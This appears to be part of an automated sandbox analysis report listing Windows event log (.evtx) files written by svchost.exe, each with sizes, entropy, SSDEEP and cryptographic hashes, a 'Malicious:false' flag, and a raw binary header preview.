                                                      SHA-512:06D3A5631E8F92221FC7E7656FE9C88D1F8F4602E049FFC2C6BB23D2B1212DF46C223C4022B25B2B5BFC678990D36C7ABEFFA29D73B9C4CA7537B86325C49F83
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................0...<.%..................................................................... ..E............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.4592900981827945
                                                      Encrypted:false
                                                      SSDEEP:1536:m8UbBN2A4VD7VAx8whAGU2woJQgh08DOHMOJVA10sk:
                                                      MD5:126180677D28DC497BD408A64EA172E1
                                                      SHA1:BEC15EF64816C36BFDAE0F0FEEB7F4C1DC69C4CD
                                                      SHA-256:5758D0C1BD538F73D7DB6C6A60BA73F75902CDC00D8F218C59D6A9CFB1DAEFD8
                                                      SHA-512:8678457B5D074F775A53AFD661BC542F5F8141C1A10A4A46BA84207EE25C720194C7C98A5CDCAFB119DA988B5E93FE464716D7292ABECF570BD014A82A1C1737
                                                      Malicious:false
                                                      Preview:ElfChnk.e.......h.......e.......h...............p...7..D......................................................................Z.............................................=...............u...........................................................................................................H...............?...............................................M...F.......................................................................&...........................................................j...............**......e.........3.w............&..........-v.W.B.j*.GP........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.415159402288347
                                                      Encrypted:false
                                                      SSDEEP:768:GPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9JFlZR19T:KXY5nVYIyyqED5BVZUeAdnYiCqh33DT
                                                      MD5:1FB37D2119F3EE57848F0D67AD48849A
                                                      SHA1:39777540E937BBD0233B8A706416B3032CA1A687
                                                      SHA-256:007EEE68AAA082FF9C775CFA67679FAF3EC8987ACDCFE8A0877CBE960DB207F7
                                                      SHA-512:68C619479B9623D6013D4CCC268287C1A871599F61CD1F2DCF4419CF9F5049C8B4EF413C3FF4BB42EED316B43354416D760A44B22CED3ADD44F36649E9C4D205
                                                      Malicious:false
                                                      Preview:ElfChnk.........x...............x...............x.....E\.....................................................................q?n................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................>.......................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):90880
                                                      Entropy (8bit):2.4579020124209734
                                                      Encrypted:false
                                                      SSDEEP:384:+hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorvorMMocoriorXoruoSt:+DCOi8DCOi0
                                                      MD5:E76733FBE94495DC553CD71B73EC9254
                                                      SHA1:3E22E9581969839A67AB626178BACB6F5AE27F0F
                                                      SHA-256:AC532EA1352AF44E64F7634F9325E10AFDF73D406208960202B79141BD9D4337
                                                      SHA-512:1B31A974B4ADC5FF0CF4015917FCF638AE0F0DE799AD2B4E29C5AA6884903103B05D0B29D7619D7405A08CF2733E0D17B03C3462D81BE89DF88E4EB58EB12D92
                                                      Malicious:false
                                                      Preview:ElfChnk......................................H...J..n..$....................................................................L..[................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................2...................................-...............'..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8225690963819652
                                                      Encrypted:false
                                                      SSDEEP:384:nhAiPA5PNPxPEPHPhPEPmPSPRP3PoPPP/yPwLPLP:n2Nq
                                                      MD5:84D9B4178F165CEA4CA029E0D12F4F9E
                                                      SHA1:97AFD3ADC37C23E5BC62CD50E67F3B4736507F81
                                                      SHA-256:297F54B0932E48FD907A267BF946A318701510A176F00D6A5ED94A6450B35C6E
                                                      SHA-512:33143501AF8B77C6AFAFCB627F1B17FF51D9E5B8E80D78E01FA71D0548EB4E8B97F46875D736267B59D381227E48A777C334064E7DFC50E03D3FA385C19124F5
                                                      Malicious:false
                                                      Preview:ElfChnk......................................#...%..r%".........................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8138145107376272
                                                      Encrypted:false
                                                      SSDEEP:384:chZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lc:cWXSYieD+tvgzmMvTah+/
                                                      MD5:93A87B180C69A5903CF9C180BF972B6B
                                                      SHA1:88A81D069CA081738D3B30A0B595B352062A5624
                                                      SHA-256:850089996AF65DB44D822CFDB75CEA9CE8A6A4D37DD93975B4CFAF04F68BF55E
                                                      SHA-512:D54637CB526BAC70688BC922C2643E44B389521B13C12FB4260F899A4989453C43C36552E11C3157DDE20457C780D7C03574BD709A75BB0B57BB838D5979542F
                                                      Malicious:false
                                                      Preview:ElfChnk......................................#...$..f..........................................................................................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................&...............................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.9700016261635906
                                                      Encrypted:false
                                                      SSDEEP:384:RhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28B:RbCyhLfIk2Q9
                                                      MD5:C403A5879E52A761F152FB343285EC80
                                                      SHA1:123E24A7AAC9843A5D3A86E72D754087547D23CF
                                                      SHA-256:F2B846D75E0D15FD2004A3A259EDF51F31C700D9B68E6AE1370F254965CDBC8A
                                                      SHA-512:2C82B5E77921CAE7574E6A7370ABC465CBD639ED7E0E4CADD2BDDA1C715EBAC2997B11ADC39068E3835749DC4E5BB7BD1658D5D91C15877E5C762A765A532C78
                                                      Malicious:false
                                                      Preview:ElfChnk.........G...............G....................W.....................................................................m.~................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n.......................~v..............................................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.2120540591507747
                                                      Encrypted:false
                                                      SSDEEP:768:fcMhFBuyKskZljdoKXjtT/r18rQXn8+BP7O:EMhFBuV
                                                      MD5:9595C1DB455101954AF6F9EA9545A857
                                                      SHA1:85AF8179EC2188CBFC4C6110E6246D966841E277
                                                      SHA-256:2D420EE05F27B53D35FBC2ABD8E68FA61ACC726330391A3234E821C90939F9B1
                                                      SHA-512:963E2C05CED0AA0852BBD9676492CA0817226DEFEB610A1192E337E2C4B535FDDB7F41CEA38D94E03F3CD861ADC7A61E11BDE85BB05186AC87F55560986ED3AE
                                                      Malicious:false
                                                      Preview:ElfChnk.........I...............I...........X......./.g......................................................................b..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.886088508991533
                                                      Encrypted:false
                                                      SSDEEP:768:DvAsAkA7g+y7vAzBCBao/F6Cf2SEqEhwaK41HZaXPVoYNdEfB:UH0
                                                      MD5:D4F0DFE5A4119A5717FF27C8EBCA3DA2
                                                      SHA1:7A28D64669D22A68A9ACAB87AD14636AAD69090A
                                                      SHA-256:D4110A38548D1DEF0B29CA5B319DD1CEB11A9BA8050B0FD705EEAAE9A8E2A078
                                                      SHA-512:A01473BD0B3E3B6943AACCC31CF3349E45729812D289A8E0CA84A480D0A7FAD4B1FEF9A94BCDE091A3D021DA45269BB828633AE285B17B1630F0C7C10F6BE766
                                                      Malicious:false
                                                      Preview:ElfChnk.w...............w...................`...p ....0I.....................................................................|..................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...............................................................**..8...w.........[~v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.9687888342064723
                                                      Encrypted:false
                                                      SSDEEP:384:oh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDE:oMAP1Qa5AgfQQp
                                                      MD5:3E6AE4DF662B5AA3415EF0E36019F09D
                                                      SHA1:F8A538EE5D4A80324727474B3C2822B5309BBAFF
                                                      SHA-256:2E70FD79B4D03A57228CD10CAE4FBFEA15A1946E4F727A9A3C6E4C30905EBF8C
                                                      SHA-512:EFE0DF5CD8917BDF3A7CC3D3C3F23AC6B9993C8EF37E51E5BA0DE3741F058DED8AB155502FA55C15ED756C60BF3384BC1BD6AB184486449365225BD0C8246B7A
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................(b..(e...n*o....................................................................Z...................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................U...............&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.428593954397479
                                                      Encrypted:false
                                                      SSDEEP:768:vWFCGPlo5jRe0bMgxV3PBT41Nm3Lwb4XP2b9Ub/b4bebbb3bVbQb+bjb8bMbw:gC1FjaujkyHrBMS/AQ
                                                      MD5:EFBC72539360CE6A39321BF0FE442A7B
                                                      SHA1:1F58389B378F167AA610EEB69560236837C9E72D
                                                      SHA-256:63DCBE413E0D801FF428BB9F900E6645E90B026CDE02B19AA1DBB0304E1F71AE
                                                      SHA-512:B0F989B84F3E8089903F3FFF818A1257CD6208377FD537DDCBFE2829E46D2AD2C4DF29B69A8DCDF3FC0F8CBDDE88372A3BEC41C2D95DF760F7EF3D8F45E3E468
                                                      Malicious:false
                                                      Preview:ElfChnk.t...............t....................M..8O....y.....................................................................@.h.................".......................J...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...................e-............... ......&....2..}#..........m....................N..........}0..........**......t...........v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.2423583340735527
                                                      Encrypted:false
                                                      SSDEEP:384:3hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klq:31T4hvqp
                                                      MD5:9C72FFFEE60C20888D6442DFA30F96DA
                                                      SHA1:7DBC45C4074ED6D9C23CBB2FB102FE28F0AF03E6
                                                      SHA-256:FF65135452A8463A8FC8B2B0A7A682321C8896202627A67A6A9CBB87CA967C92
                                                      SHA-512:68FBF1C38B8CAE6C4DDADFC18660BD8F6F62D73F634D850D1C7A0932E8159A301B589C6F59EDF482668E14DA95E96048C2411C39212715DF9D2C1CDE5CF1FF9E
                                                      Malicious:false
                                                      Preview:ElfChnk.........i...............i........... ........po.........................................................................................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.3531516657590963
                                                      Encrypted:false
                                                      SSDEEP:384:NchFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDW:SzSKEqsMuy6C
                                                      MD5:DA384425E3EEA8087F6731F7EE3DB772
                                                      SHA1:2D9B780AB5E10C4C18A9765873BB5D87D7D0C4A5
                                                      SHA-256:29C747FE79EE865AC2F59E8656F9E13484F370A944F5A6F1B001EB5849F34456
                                                      SHA-512:C96CBF23D2590F4986A1BBC6A1000BAA0D2A46F7744C59FC97C09BF5BE8B9DE30006A3960CC7BFB01B1DE54B1F435053240CCDA6106638E4428A76622F6D57AC
                                                      Malicious:false
                                                      Preview:ElfChnk.........H...............H...........Xy...z...U>K......................................................................;................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=................`..............................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.067840786143577
                                                      Encrypted:false
                                                      SSDEEP:384:UYhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3B:xmw9g3Lu
                                                      MD5:FC30BCA14D074E23863821A5D1C99310
                                                      SHA1:E02F0200FFB00B6E97ED2249C003EA61B98BAE7A
                                                      SHA-256:637112F9564861E2B38E6272ABB2AEF3D1CF67DE8B0132DDA165D80D1888896D
                                                      SHA-512:DB9DA92830EF89D417B4541C86D968E5E34DD7D012195AD8424F049ABA9CEC31323333086F8743105B6D732B5368B3C7ACA6A952DE0365C788A799C6EC33956E
                                                      Malicious:false
                                                      Preview:ElfChnk.........3...............3............i..Xk...p......................................................................G...................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#................X..............................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.9013141789584527
                                                      Encrypted:false
                                                      SSDEEP:384:dRh2IYYINEIuIgucwi2IM+I6eIiISpI2+IAI+ITNI/6ILIbI+I:fspNI
                                                      MD5:429D91656AEA2040959DEB5C242DD865
                                                      SHA1:98BC49D2423BB8DBE3829DFC3EE1ABB18BECC4F7
                                                      SHA-256:BC38E1F423840D557385A43F23B1C8CA2C8FA7F41672167D7A1A8D5637E9213B
                                                      SHA-512:0E8C5B68D5513A20D256047AF256191FE7E1BD5AEC0BB77F0A9D5DDE08F30A331342229E398D395FF431A684F2771F456E546C7F88D473D8FE5E99D8441A3F3D
                                                      Malicious:false
                                                      Preview:ElfChnk.8.......H.......8.......H...............H..........................................................................R..S................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................5)......................................................................................**......8.......Q(.Bo.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.0613471542370174
                                                      Encrypted:false
                                                      SSDEEP:384:3h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMXpxMPGMtbMkP:3eJaR
                                                      MD5:C67B1E4F2BD829BD747226920AB86F1A
                                                      SHA1:249C5BAD68E543FFFB9EE95EE72A9D74A4BA020B
                                                      SHA-256:23EE8762E2F3BA4AEC936695B2A44AF1AA0643956A312A1A233F8A403E3397F5
                                                      SHA-512:DD15B409EB26400A20B5539110C9865808976F8A55D161CA8FA70EF56E1CCE3F58B38B0777CDB13E7FA8A532924013A531F965A9CDD97D277168ADE03274EC37
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................P0..o.0b....................................................................W.P*........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................................)..............................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.015119691858683
                                                      Encrypted:false
                                                      SSDEEP:384:Ahk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1G:ABjdjP0csP1P
                                                      MD5:C166821735DECBE900C8932229387587
                                                      SHA1:1C0F4203F095DECC7B7A55ED86A4B7EE7BDC4AEF
                                                      SHA-256:8057DF6208CB8E99851CEAB8C375DFFC66DE911374139A922BE3AAB5FFD4216A
                                                      SHA-512:981FBEA4B761C91185AAF371436135367B76249F78350B47CC4CBCE86AFC7A2B2F810404980A7FF9CBA513E1B44C5DBC452F133D600895EFC6FA4D893EF14F90
                                                      Malicious:false
                                                      Preview:ElfChnk.........~...............~...........(......../.U....................................................................x.m.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.008616541231652
                                                      Encrypted:false
                                                      SSDEEP:384:bkhDIEQAGxIHIFIW9IflITiIfIEI+IhvrIXI4IdIJYIfXITzIchIdlIfiITZBI41:bkZxGg4t0rR/vbt
                                                      MD5:721E48459D305DA14DC0A93B2178A56E
                                                      SHA1:A6E9A6DD7C8B67F80376DDBE1233EEBF3249BB72
                                                      SHA-256:9B3ED7027E07CD0EA5A2E94FC4D385B20F304BCB5E5964BE9FD04380F373F219
                                                      SHA-512:613BBA96B42B5EEDC40B0CB8D43C7D5A8183F75E944904D5A51150AF7981547E8A880C3180CB85B21AE7C4316BC2F7A752EFFCB305318BCE70537A98E195FEE2
                                                      Malicious:false
                                                      Preview:ElfChnk.T...............T...................H...8..........................................................................lH{.........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................y..................1....J...................................)..........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7762826173073204
                                                      Encrypted:false
                                                      SSDEEP:384:dWh6iIvcImIvITIQIoIoI3IEIMIoIBIQIssImIaIErI:dWoxw0
                                                      MD5:6EE4AC1814B31DCBD723D72E291AB08B
                                                      SHA1:B258FB048E1EBFA5D5AF4D44FC46C9553BCD4532
                                                      SHA-256:DE576BC4A4CE5F2595B830029354848D10AE01EE7370EE1110F3829D5D00F949
                                                      SHA-512:413E15D4594190DBD5827B5F0C536A3D6D28D3252B788D83F63F52ACCA9A07A798442F0953BB3BD6F5AAECA48202BB1D1340E9D2383AA949646F422BCDE3AA0A
                                                      Malicious:false
